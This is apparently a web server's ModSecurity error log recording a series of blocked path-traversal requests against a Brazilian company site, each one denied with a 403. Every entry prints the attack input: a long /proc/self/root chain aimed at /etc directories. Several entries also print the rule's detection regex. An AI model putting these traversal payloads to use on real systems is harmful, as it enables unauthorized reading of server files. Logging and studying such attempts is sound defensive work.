[Wed Mar 18 05:34:18.358439 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:58230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjigkwaGbbGflqUZDdcAAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:34:24.051600 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:49930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjkOw_le52K8_3pV2s6gAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:34:55.408415 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:49944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjr9Y0UrI5A3LftIximwAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:35:01.307851 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:51052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjtdY0UrI5A3LftIxioQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:35:22.264576 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:39288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjyeoXxyEfFpUF8f845gAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:35:51.531175 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:55602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpj5-oXxyEfFpUF8f85AwAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:36:14.538135 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:41842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpj_kzinOy1jxa1j4fe8wAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:15.926994 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:33134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpj_-oXxyEfFpUF8f85JAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:17.221668 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:33140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkAUzinOy1jxa1j4fe9AAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:18.522953 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:33152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkAkzinOy1jxa1j4fe9gAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:19.955808 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:55810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkAwkwaGbbGflqUZDdpQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:21.372907 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:55826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkBfu8EFLIOrSqIpvSggAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:22.667994 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:55840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkBuw_le52K8_3pV2tIwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:26.127405 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:55842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkCgkwaGbbGflqUZDdqQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:27.498910 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:55844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkC8df6f5d65gmYZSeWQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:28.861166 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:55848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkDNa6ubjKNq_cu4ZicgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:30.317073 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:47648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkDtY0UrI5A3LftIxivwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:31.632102 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:47650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkDymAPhZkrhU8w4k7NwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:32.977848 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:47662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkECmAPhZkrhU8w4k7OQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:34.395225 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:47666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkEta6ubjKNq_cu4ZidAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:36:38.860801 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:47672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkFtY0UrI5A3LftIxiywAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
